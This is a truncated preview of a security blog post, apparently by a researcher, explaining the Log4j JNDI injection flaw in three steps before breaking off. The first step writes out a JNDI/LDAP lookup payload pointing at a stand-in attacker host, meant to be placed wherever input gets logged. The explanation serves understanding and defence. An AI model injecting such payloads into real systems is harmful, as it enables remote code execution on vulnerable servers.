How it’s work:

  1. We send a specially formed request like $ {jndi: ldap: //attacker.host/blabla} to any place that can potentially be logged.
  2. JNDI (Java Naming and Directory Interface), in turn, processes the template, requests data via LDAP from attacker.host
  3. In the response, a JAVA class is given, which allows you…

--

--

YevhSec1

YevhSec1

443 Followers

MSc in Cyber Security, OSCP, eWPTXv2, CEH Master. Awarded by Apple, Trello, Kraken... Connect: https://www.linkedin.com/in/yevhenii-molchanov-aa565210b/